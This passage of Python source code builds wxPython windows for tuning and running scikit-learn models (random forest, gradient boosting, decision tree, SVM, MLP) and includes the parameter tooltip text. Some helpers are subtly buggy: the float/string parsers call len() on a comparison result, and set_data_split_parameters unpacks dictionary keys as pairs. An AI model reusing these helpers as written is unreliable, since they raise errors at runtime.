wx.EVT_BUTTON, self.on_calculate, id=self.button_calculate.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON, self.on_features, id=self.button_features.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_feature_importance,\n id=self.button_importance.GetId(),\n )\n self.Bind(\n wx.EVT_BUTTON, self.on_export, id=self.button_export_data.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_save_figure,\n id=self.button_save_figure.GetId(),\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_save_model,\n id=self.button_save_model.GetId(),\n )\n self.Bind(wx.EVT_SIZE, self.on_resize)\n\n def set_properties(self):\n self.SetTitle(self.title)\n x_size = [0.6, 0.8][self.include_test_data]\n self.SetMinSize(get_window_size(x_size, 0.7))\n self.set_defaults()\n\n for key, input_obj in self.input.items():\n input_obj.SetToolTip(self.tool_tips[key])\n\n for key, input_obj in self.data_split_input.items():\n input_obj.SetToolTip(DATA_SPLIT_TOOL_TIPS[key])\n\n def do_layout(self):\n sizer_wrapper = wx.BoxSizer(wx.HORIZONTAL)\n sizer_side_bar = wx.BoxSizer(wx.VERTICAL)\n sizer_actions = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"Actions\"), wx.VERTICAL\n )\n sizer_param = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"Parameters\"), wx.VERTICAL\n )\n sizer_split_param = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"Data Split\"), wx.VERTICAL\n )\n\n variables = list(self.input)\n variables.sort()\n sizer_input = {\n variable: wx.BoxSizer(wx.HORIZONTAL) for variable in variables\n }\n for variable in variables:\n sizer_input[variable].Add(\n wx.StaticText(self, wx.ID_ANY, \"%s:\\t\" % variable),\n 0,\n wx.EXPAND,\n 0,\n )\n sizer_input[variable].Add(self.input[variable], 1, wx.EXPAND, 0)\n sizer_param.Add(sizer_input[variable], 1, wx.EXPAND | wx.ALL, 2)\n sizer_side_bar.Add(sizer_param, 0, wx.ALL | wx.EXPAND, 5)\n\n split_variables = [\n \"test_size\",\n \"train_size\",\n \"random_state\",\n \"shuffle\",\n ]\n sizer_split_input = {\n variable: wx.BoxSizer(wx.HORIZONTAL)\n for variable in split_variables\n }\n for variable in split_variables:\n sizer_split_input[variable].Add(\n wx.StaticText(self, wx.ID_ANY, \"%s:\\t\" % variable),\n 0,\n wx.EXPAND,\n 0,\n )\n sizer_split_input[variable].Add(\n self.data_split_input[variable], 1, wx.EXPAND, 0\n )\n sizer_split_param.Add(\n sizer_split_input[variable], 1, wx.EXPAND | wx.ALL, 2\n )\n sizer_side_bar.Add(sizer_split_param, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_actions.Add(\n self.button_calculate,\n 1,\n wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP,\n 5,\n )\n sizer_actions.Add(\n self.button_features, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5\n )\n sizer_actions.Add(\n self.button_importance,\n 1,\n wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP,\n 5,\n )\n sizer_actions.Add(\n self.button_export_data, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5\n )\n sizer_actions.Add(\n self.button_save_figure, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5\n )\n sizer_actions.Add(\n self.button_save_model,\n 1,\n wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT,\n 5,\n )\n sizer_side_bar.Add(sizer_actions, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_wrapper.Add(sizer_side_bar, 0, wx.EXPAND, 0)\n\n sizer_wrapper.Add(self.plot.layout, 1, wx.EXPAND, 0)\n\n set_msw_background_color(\n self\n ) # If windows, change the background color\n set_frame_icon(self)\n\n self.SetSizer(sizer_wrapper)\n self.Layout()\n self.Fit()\n self.Center()\n\n def get_param(self, variable):\n ans = variable in list(self.input)\n input_dict = [self.data_split_input, self.input][ans]\n default_dict = [self.data_split_defaults, 
self.defaults][ans]\n getters_dict = [self.data_split_getters, self.getters][ans]\n\n try:\n return getters_dict[variable](input_dict[variable].GetValue())\n except Exception:\n return default_dict[variable]\n\n def set_defaults(self):\n for variable, input_obj in self.input.items():\n input_obj.SetValue(self.to_str_for_gui(self.defaults[variable]))\n for variable, input_obj in self.data_split_input.items():\n input_obj.SetValue(\n self.to_str_for_gui(self.data_split_defaults[variable])\n )\n\n @property\n def input_parameters(self):\n return {\n variable: self.get_param(variable)\n for variable in self.input.keys()\n if self.get_param(variable) != self.defaults[variable]\n }\n\n def set_input_parameters(self, input_parameters):\n for variable, value in input_parameters.items():\n self.input[variable].SetValue(str(value))\n\n @property\n def data_split_parameters(self):\n return {\n variable: self.get_param(variable)\n for variable in self.data_split_input.keys()\n if self.get_param(variable) != self.data_split_defaults[variable]\n }\n\n def set_data_split_parameters(self, data_split_input):\n for variable, value in data_split_input.keys():\n self.data_split_input[variable].SetValue(str(value))\n\n def to_int_float_or_none(self, str_value):\n if str_value.lower() == \"none\":\n return None\n return self.to_int_or_float(str_value)\n\n @staticmethod\n def to_int_float_string_or_none(str_value):\n if str_value.lower() == \"none\":\n return None\n if str_value.isnumeric(): # int\n return int(float(str_value))\n if \".\" in str_value and len(str_value.split(\".\") == 2):\n return float(str_value)\n return str_value\n\n @staticmethod\n def to_int_or_float(str_value):\n if str_value.isnumeric(): # int\n return int(float(str_value))\n return float(str_value)\n\n def to_int_or_none(self, str_value):\n if str_value.lower() == \"none\":\n return None\n return self.to_int(str_value)\n\n def to_float_or_none(self, str_value):\n if str_value.lower() == \"none\":\n return None\n return self.to_float(str_value)\n\n @staticmethod\n def to_int(str_value):\n return int(float(str_value))\n\n @staticmethod\n def to_float(str_value):\n return float(str_value)\n\n @staticmethod\n def to_str(str_value):\n return str_value\n\n @staticmethod\n def to_float_or_str(str_value):\n if \".\" in str_value and len(str_value.split(\".\") == 2):\n if (\n \"%s\" % (str_value.split(\".\")[0] + str_value.split(\".\")[1])\n ).isnumeric():\n return float(str_value)\n return str_value\n\n def to_float_str_or_none(self, str_value):\n try:\n return self.to_float_or_none(str_value)\n except Exception:\n return str_value\n\n @staticmethod\n def to_bool(str_value):\n if str_value.lower() == \"true\":\n return True\n return False\n\n @staticmethod\n def to_bool_or_str(str_value):\n if str_value.lower() == \"true\":\n return True\n if str_value.lower() == \"false\":\n return False\n return str_value\n\n @staticmethod\n def to_str_for_gui(value):\n if value is None:\n return \"None\"\n return str(value)\n\n @property\n def plot_data(self):\n try:\n self.model = self.sklearn_predictor(**self.input_parameters)\n return MachineLearningPlotData(\n self.data[\"X\"],\n self.data[\"y\"],\n self.model,\n **self.data_split_parameters\n )\n except Exception as e:\n wx.MessageBox(\n str(e), \"Error!\", wx.OK | wx.OK_DEFAULT | wx.ICON_WARNING\n )\n\n def do_prediction(self):\n self.model = self.sklearn_predictor(**self.input_parameters)\n return MachineLearningPlotData(\n self.data[\"X\"],\n self.data[\"y\"],\n self.model,\n 
**self.data_split_parameters\n )\n\n def on_calculate(self, evt):\n data = self.plot_data\n if data is not None:\n self.plot.update_data(data)\n\n def redraw_plot(self):\n self.plot.redraw_plot()\n\n def on_resize(self, *evt):\n try:\n self.Refresh()\n self.Layout()\n wx.CallAfter(self.redraw_plot)\n except RuntimeError:\n pass\n\n def on_export(self, evt):\n save_data_to_file(\n self, \"Save machine learning data to csv\", self.plot.get_csv()\n )\n\n def on_save_figure(self, *evt):\n title = \"Save %s Plot to .html\" % self.title.title()\n export_frame = self.main_app_frame.export_figure\n attr_dicts = None if export_frame is None else export_frame.attr_dicts\n self.plot.save_figure_dlg(self, title, attr_dicts=attr_dicts)\n\n def on_save_model(self, evt):\n data = {\n \"y_variable\": self.plot.y_variable,\n \"model\": self.model,\n \"sklearn_predictor\": self.sklearn_predictor,\n \"tool_tips\": self.tool_tips,\n \"x_variables\": self.plot.x_variables,\n \"title\": self.title,\n \"input_parameters\": self.input_parameters,\n \"data_split\": self.data_split_parameters,\n \"version\": DefaultOptions().VERSION,\n }\n save_data_to_file(\n self,\n \"Save Model\",\n data,\n wildcard=\"MODEL files (*.ml)|*.ml\",\n data_type=\"pickle\",\n initial_dir=MODELS_DIR,\n )\n\n def run(self):\n self.set_properties()\n self.do_layout()\n self.Show()\n self.on_calculate(None)\n\n @property\n def frame_size(self):\n return self.GetSize()\n\n @property\n def ml_type_short(self):\n return \"\".join([s[0] for s in self.title.split(\" \")]).upper()\n\n def on_features(self, *evt):\n ShowList(self.plot.x_variables, \"Features\")\n\n def on_feature_importance(self, evt):\n title = \"Importance Figure for %s (%s)\" % (\n self.title,\n self.data[\"y_variable\"],\n )\n plot_title = \"%s Feature Importances for %s\" % (\n self.title,\n self.data[\"y_variable\"],\n )\n self.feature_importance_dlg = FeatureImportanceFrame(\n self.data[\"options\"],\n self.data[\"x_variables\"],\n self.model.feature_importances_,\n title,\n plot_title,\n )\n self.feature_importance_dlg.Show()\n\n\nclass RandomForestFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n tool_tips = [RF_TOOL_TIPS_CLASSIFIER, RF_TOOL_TIPS][\n alg_type == \"regressor\"\n ]\n crit_choices = [[\"gini\", \"entropy\"], [\"mse\", \"mae\"]][\n alg_type == \"regressor\"\n ]\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Random Forest\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n tool_tips=tool_tips,\n )\n\n self.input = {\n \"n_estimators\": wx.TextCtrl(self, wx.ID_ANY, \"100\"),\n \"criterion\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=crit_choices,\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"max_depth\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_samples_split\": wx.TextCtrl(self, wx.ID_ANY, \"2\"),\n \"min_samples_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"1\"),\n \"min_weight_fraction_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"max_features\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"max_leaf_nodes\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_impurity_decrease\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"bootstrap\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"oob_score\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"n_jobs\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n 
\"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n }\n\n self.defaults = {\n \"n_estimators\": 100,\n \"criterion\": crit_choices[0],\n \"max_depth\": None,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0.0,\n \"max_features\": None,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0.0,\n \"bootstrap\": True,\n \"oob_score\": False,\n \"n_jobs\": None,\n \"random_state\": None,\n }\n\n self.getters = {\n \"n_estimators\": self.to_int,\n \"criterion\": self.to_str,\n \"max_depth\": self.to_int_or_none,\n \"min_samples_split\": self.to_int_or_float,\n \"min_samples_leaf\": self.to_int_or_float,\n \"min_weight_fraction_leaf\": self.to_float,\n \"max_features\": self.to_int_float_string_or_none,\n \"max_leaf_nodes\": self.to_int_or_none,\n \"min_impurity_decrease\": self.to_float,\n \"bootstrap\": self.to_bool,\n \"oob_score\": self.to_bool,\n \"n_jobs\": self.to_int_or_none,\n \"random_state\": self.to_int_or_none,\n }\n\n self.run()\n\n\nclass GradientBoostingFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Gradient Boosting\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"loss\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"ls\", \"lad\", \"huber\", \"quantile\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"learning_rate\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"n_estimators\": wx.TextCtrl(self, wx.ID_ANY, \"100\"),\n \"subsample\": wx.TextCtrl(self, wx.ID_ANY, \"1.0\"),\n \"criterion\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"friedman_mse\", \"mse\", \"mae\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"max_depth\": wx.TextCtrl(self, wx.ID_ANY, \"3\"),\n \"min_samples_split\": wx.TextCtrl(self, wx.ID_ANY, \"2\"),\n \"min_samples_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"1\"),\n \"min_weight_fraction_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"max_features\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"alpha\": wx.TextCtrl(self, wx.ID_ANY, \"0.9\"),\n \"max_leaf_nodes\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_impurity_decrease\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"init\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"DummyEstimator\", \"zero\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"presort\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"auto\", \"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"validation_fraction\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"n_iter_no_change\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"tol\": wx.TextCtrl(self, wx.ID_ANY, \"1e-4\"),\n }\n\n self.defaults = {\n \"loss\": \"ls\",\n \"learning_rate\": 0.1,\n \"n_estimators\": 100,\n \"subsample\": 1.0,\n \"criterion\": \"friedman_mse\",\n \"max_depth\": 3,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0,\n \"max_features\": None,\n \"alpha\": 0.9,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0,\n \"init\": \"DummyEstimator\",\n \"random_state\": None,\n \"presort\": \"auto\",\n \"validation_fraction\": 0.1,\n \"n_iter_no_change\": None,\n \"tol\": float(\"1e-4\"),\n }\n\n self.getters = {\n \"loss\": self.to_str,\n \"learning_rate\": self.to_float,\n \"n_estimators\": self.to_int,\n \"subsample\": self.to_float,\n \"criterion\": self.to_str,\n \"max_depth\": 
self.to_int,\n \"min_samples_split\": self.to_int_or_float,\n \"min_samples_leaf\": self.to_int_or_float,\n \"min_weight_fraction_leaf\": self.to_float,\n \"max_features\": self.to_int_float_string_or_none,\n \"alpha\": self.to_float,\n \"max_leaf_nodes\": self.to_int_or_none,\n \"min_impurity_decrease\": self.to_float,\n \"init\": self.to_str,\n \"random_state\": self.to_int_or_none,\n \"presort\": self.to_bool_or_str,\n \"validation_fraction\": self.to_float,\n \"n_iter_no_change\": self.to_int_or_none,\n \"tol\": self.to_float,\n }\n\n self.run()\n\n\nclass DecisionTreeFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Decision Tree\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"criterion\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"mse\", \"friedman_mse\", \"mae\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"splitter\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"best\", \"random\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"max_depth\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_samples_split\": wx.TextCtrl(self, wx.ID_ANY, \"2\"),\n \"min_samples_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"1\"),\n \"min_weight_fraction_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"max_features\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"max_leaf_nodes\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_impurity_decrease\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"presort\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n }\n\n self.defaults = {\n \"criterion\": \"mse\",\n \"splitter\": \"best\",\n \"max_depth\": None,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0.0,\n \"max_features\": None,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0.0,\n \"random_state\": None,\n \"presort\": False,\n }\n\n self.getters = {\n \"criterion\": self.to_str,\n \"splitter\": self.to_str,\n \"max_depth\": self.to_int_or_none,\n \"min_samples_split\": self.to_int_or_float,\n \"min_samples_leaf\": self.to_int_or_float,\n \"min_weight_fraction_leaf\": self.to_float,\n \"max_features\": self.to_int_float_string_or_none,\n \"max_leaf_nodes\": self.to_int_or_none,\n \"min_impurity_decrease\": self.to_float,\n \"random_state\": self.to_int_or_none,\n \"presort\": self.to_bool,\n }\n\n self.run()\n\n\nclass SupportVectorRegressionFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Support Vector Machine\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"kernel\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"rbf\",\n choices=[\"linear\", \"poly\", \"rbf\", \"sigmoid\", \"precomputed\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"degree\": wx.TextCtrl(self, wx.ID_ANY, \"3\"),\n \"gamma\": wx.TextCtrl(self, wx.ID_ANY, \"auto\"),\n \"coef0\": wx.TextCtrl(self, wx.ID_ANY, \"0.0\"),\n \"tol\": wx.TextCtrl(self, wx.ID_ANY, \"1e-3\"),\n \"C\": wx.TextCtrl(self, wx.ID_ANY, \"1.0\"),\n \"epsilon\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"shrinking\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"True\",\n choices=[\"True\", \"False\"],\n 
style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"cache_size\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"max_iter\": wx.TextCtrl(self, wx.ID_ANY, \"-1\"),\n }\n\n self.defaults = {\n \"kernel\": \"rbf\",\n \"degree\": 3,\n \"gamma\": \"scale\",\n \"coef0\": 0.0,\n \"tol\": 0.001,\n \"C\": 1.0,\n \"epsilon\": 0.1,\n \"shrinking\": True,\n \"cache_size\": None,\n \"max_iter\": -1,\n }\n\n self.getters = {\n \"kernel\": self.to_str,\n \"degree\": self.to_int,\n \"gamma\": self.to_float_or_str,\n \"coef0\": self.to_float,\n \"tol\": self.to_float,\n \"C\": self.to_float,\n \"epsilon\": self.to_float,\n \"shrinking\": self.to_bool,\n \"cache_size\": self.to_float_or_none,\n \"max_iter\": self.to_int,\n }\n\n self.button_importance.Disable()\n\n self.run()\n\n\nclass MLPFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Multilayer Perceptron\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"activation\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"relu\",\n choices=[\"identity\", \"logistic\", \"tanh\", \"relu\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"solver\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"adam\",\n choices=[\"lbfgs\", \"sgd\", \"adam\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"alpha\": wx.TextCtrl(self, wx.ID_ANY, \"0.001\"),\n \"batch_size\": wx.TextCtrl(self, wx.ID_ANY, \"auto\"),\n \"learning_rate\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"constant\",\n choices=[\"constant\", \"invscaling\", \"adaptive\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"learning_rate_init\": wx.TextCtrl(self, wx.ID_ANY, \"0.001\"),\n \"power_t\": wx.TextCtrl(self, wx.ID_ANY, \"0.5\"),\n \"max_iter\": wx.TextCtrl(self, wx.ID_ANY, \"200\"),\n \"shuffle\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"True\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"tol\": wx.TextCtrl(self, wx.ID_ANY, \"1e-4\"),\n \"warm_start\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"False\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"momentum\": wx.TextCtrl(self, wx.ID_ANY, \"0.9\"),\n \"nesterovs_momentum\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"True\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"early_stopping\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"False\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"validation_fraction\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"beta_1\": wx.TextCtrl(self, wx.ID_ANY, \"0.9\"),\n \"beta_2\": wx.TextCtrl(self, wx.ID_ANY, \"0.999\"),\n \"epsilon\": wx.TextCtrl(self, wx.ID_ANY, \"1e-8\"),\n \"n_iter_no_change\": wx.TextCtrl(self, wx.ID_ANY, \"10\"),\n }\n\n self.defaults = {\n \"activation\": \"relu\",\n \"solver\": \"adam\",\n \"alpha\": 0.0001,\n \"batch_size\": \"auto\",\n \"learning_rate\": \"constant\",\n \"learning_rate_init\": 0.001,\n \"power_t\": 0.5,\n \"max_iter\": 200,\n \"shuffle\": True,\n \"random_state\": None,\n \"tol\": 1e-4,\n \"warm_start\": False,\n \"momentum\": 0.9,\n \"nesterovs_momentum\": True,\n \"early_stopping\": False,\n \"validation_fraction\": 0.1,\n \"beta_1\": 0.9,\n \"beta_2\": 0.999,\n \"epsilon\": 1e-08,\n \"n_iter_no_change\": 10,\n }\n\n self.getters = {\n \"activation\": self.to_str,\n \"solver\": self.to_str,\n \"alpha\": self.to_float,\n 
\"batch_size\": self.to_float_or_str,\n \"learning_rate\": self.to_str,\n \"learning_rate_init\": self.to_float,\n \"power_t\": self.to_float,\n \"max_iter\": self.to_int,\n \"shuffle\": self.to_bool,\n \"random_state\": self.to_int_or_none,\n \"tol\": self.to_float,\n \"warm_start\": self.to_bool,\n \"momentum\": self.to_float,\n \"nesterovs_momentum\": self.to_bool,\n \"early_stopping\": self.to_bool,\n \"validation_fraction\": self.to_float,\n \"beta_1\": self.to_float,\n \"beta_2\": self.to_float,\n \"epsilon\": self.to_float,\n \"n_iter_no_change\": self.to_int,\n }\n\n self.button_importance.Disable()\n\n self.run()\n\n\nRF_TOOL_TIPS = {\n \"n_estimators\": \"int\\nThe number of trees in the forest.\",\n \"criterion\": \"The function to measure the quality of a split. Supported criteria are \"\n \"“mse” for the mean squared error, which is equal to variance reduction as\"\n \" feature selection criterion, and “mae” for the mean absolute error.\",\n \"max_depth\": \"int, None\\nThe maximum depth of the tree. If None, then nodes are expanded until all \"\n \"leaves are pure or until all leaves contain less than min_samples_split samples.\",\n \"min_samples_split\": \"int, float\\nThe minimum number of samples required to split an \"\n \"internal node:\\n• If int, then consider min_samples_split as the \"\n \"minimum number.\\n• If float, then min_samples_split is a fraction \"\n \"and ceil(min_samples_split * n_samples) are the minimum number \"\n \"of samples for each split.\",\n \"min_samples_leaf\": \"int, float\\nThe minimum number of samples required to be at a leaf\"\n \" node. A split point at any depth will only be considered if it \"\n \"leaves at least min_samples_leaf training samples in each of the \"\n \"left and right branches. This may have the effect of smoothing \"\n \"the model, especially in regression.\\n• If int, then consider min_\"\n \"samples_leaf as the minimum number.\\n• If float, then min_samples_\"\n \"leaf is a fraction and ceil(min_samples_leaf * n_samples) are the \"\n \"minimum number of samples for each node.\",\n \"min_weight_fraction_leaf\": \"float\\nThe minimum weighted fraction of the sum total of \"\n \"weights (of all the input samples) required to be at a leaf\"\n \" node. Samples have equal weight when sample_weight is not\"\n \" provided.\",\n \"max_features\": \"int, float, string, or None\\nThe number of features to consider when \"\n \"looking for the best split:\\n• If int, then consider max_features \"\n \"features at each split.\\n• If float, then max_features is a fraction\"\n \" and int(max_features * n_features) features are considered at each \"\n \"split.\\n• If “auto”, then max_features=n_features.\\n• If “sqrt”, \"\n \"then max_features=sqrt(n_features).\\n• If “log2”, then max_\"\n \"features=log2(n_features).\\n• If None, then max_features=n_features.\",\n \"max_leaf_nodes\": \"int or None\\nGrow a tree with max_leaf_nodes in best-first fashion. \"\n \"Best nodes are defined as relative reduction in impurity. 
If None \"\n \"then unlimited number of leaf nodes.\",\n \"min_impurity_decrease\": \"float\\nA node will be split if this split induces a decrease \"\n \"of the impurity greater than or equal to this value.\\nThe \"\n \"weighted impurity decrease equation is the following:\\n\"\n \"N_t / N * (impurity - N_t_R / N_t * right_impurity\\n\"\n \" - N_t_L / N_t * left_impurity)\\n\"\n \"where N is the total number of samples, N_t is the number of \"\n \"samples at the current node, N_t_L is the number of samples \"\n \"in the left child, and N_t_R is the number of samples in the \"\n \"right child.\\nN, N_t, N_t_R and N_t_L all refer to the \"\n \"weighted sum, if sample_weight is passed.\",\n \"bootstrap\": \"Whether bootstrap samples are used when building trees. If False, the \"\n \"whole datset is used to build each tree.\",\n \"oob_score\": \"whether to use out-of-bag samples to estimate the R^2 on unseen data.\",\n \"n_jobs\": \"int or None\\nThe number of jobs to run in parallel for both fit and \"\n \"predict. None` means 1 unless in a joblib.parallel_backend context. -1 \"\n \"means using all processors.\",\n \"random_state\": \"int or None\\nIf int, random_state is the seed used by the random \"\n \"number generator; If None, the random number generator is the \"\n \"RandomState instance used by np.random.\",\n}\n\nRF_TOOL_TIPS_CLASSIFIER = {key: value for key, value in RF_TOOL_TIPS.items()}\nRF_TOOL_TIPS_CLASSIFIER[\"criterion\"] = (\n \"The function to measure the quality of a split. Supported criteria \"\n \"are “gini” for the Gini impurity and “entropy” for the information gain. \\n\"\n \"Note: this parameter is tree-specific.\"\n)\n\nGB_TOOL_TIPS = {\n \"loss\": \"loss function to be optimized. ‘ls’ refers to least squares regression. \"\n \"‘lad’ (least absolute deviation) is a highly robust loss function solely \"\n \"based on order information of the input variables. ‘huber’ is a combination \"\n \"of the two. ‘quantile’ allows quantile regression (use alpha to specify the \"\n \"quantile).\",\n \"learning_rate\": \"float\\nlearning rate shrinks the contribution of each tree by \"\n \"learning_rate. There is a trade-off between learning_rate and n_estimators.\",\n \"n_estimators\": \"int\\nThe number of boosting stages to perform. Gradient boosting is \"\n \"fairly robust to over-fitting so a large number usually results in \"\n \"better performance.\",\n \"subsample\": \"float\\nThe fraction of samples to be used for fitting the individual \"\n \"base learners. If smaller than 1.0 this results in Stochastic Gradient \"\n \"Boosting. subsample interacts with the parameter n_estimators. Choosing \"\n \"subsample < 1.0 leads to a reduction of variance and an increase in bias.\",\n \"criterion\": \"The function to measure the quality of a split. Supported criteria are\"\n \" “friedman_mse” for the mean squared error with improvement score by \"\n \"Friedman, “mse” for mean squared error, and “mae” for the mean absolute\"\n \" error. The default value of “friedman_mse” is generally the best as it \"\n \"can provide a better approximation in some cases.\",\n \"max_depth\": \"int\\nmaximum depth of the individual regression estimators. The maximum \"\n \"depth limits the number of nodes in the tree. 
Tune this parameter for \"\n \"best performance; the best value depends on the interaction of the input\"\n \" variables.\",\n \"min_samples_split\": \"int, float\\nThe minimum number of samples required to split an \"\n \"internal node:\\n• If int, then consider min_samples_split as \"\n \"the minimum number.\\n• If float, then min_samples_split is a \"\n \"fraction and ceil(min_samples_split * n_samples) are the minimum\"\n \" number of samples for each split.\",\n \"min_samples_leaf\": \"int, float\\nThe minimum number of samples required to be at a \"\n \"leaf node. A split point at any depth will only be considered if \"\n \"it leaves at least min_samples_leaf training samples in each of \"\n \"the left and right branches. This may have the effect of \"\n \"smoothing the model, especially in regression.\\n• If int, then \"\n \"consider min_samples_leaf as the minimum number.\\n• If float, \"\n \"then min_samples_leaf is a fraction and ceil(min_samples_leaf * \"\n \"n_samples) are the minimum number of samples for each node.\",\n \"min_weight_fraction_leaf\": \"float\\nThe minimum weighted fraction of the sum total of \"\n \"weights (of all the input samples) required to be at a \"\n \"leaf node. Samples have equal weight when sample_weight is\"\n \" not provided.\",\n \"max_features\": \"int, float, string, or None\\nThe number of features to consider when\"\n \" looking for the best split:\\n• If int, then consider max_features\"\n \" features at each split.\\n• If float, then max_features is a \"\n \"fraction and 